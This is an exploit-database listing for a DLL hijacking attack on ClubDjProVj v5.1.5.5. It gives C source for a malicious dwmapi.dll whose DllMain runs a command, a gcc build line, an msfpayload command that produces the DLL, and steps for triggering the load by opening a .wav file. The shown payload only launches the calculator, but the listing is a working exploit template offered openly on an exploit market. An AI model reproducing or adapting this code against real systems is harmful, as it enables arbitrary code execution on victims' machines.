[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ClubDjProVj v5.1.5.5 dll hijacking dwmapi.dll

Author
Aaftab paul
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15876
Category
local exploits
Date add
19-04-2011
Platform
windows
/* ClubDjProVj v5.1.5.5 dll hijacking dwmapi.dll
Author Aaftab paul
Publisher ClubDJPro.com
Vuln DLL => dwmapi.dll
Web => http://aslitsecurity.com
blog => http://aslitsecurity.blogspot.com
Extebtions wav
gcc -shared -o dwmapi.dll test.c
or
msfpayload windows/exec CMD=calc.exe D > dwmapi.dll
Tested on XP SP2
To load right click on file name of above ext. And select openwith=>browse=>ClubDjProVj

*/

#include <windows.h>

int hax()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  hax();
  return 0;
}



#  0day.today [2024-12-25]  #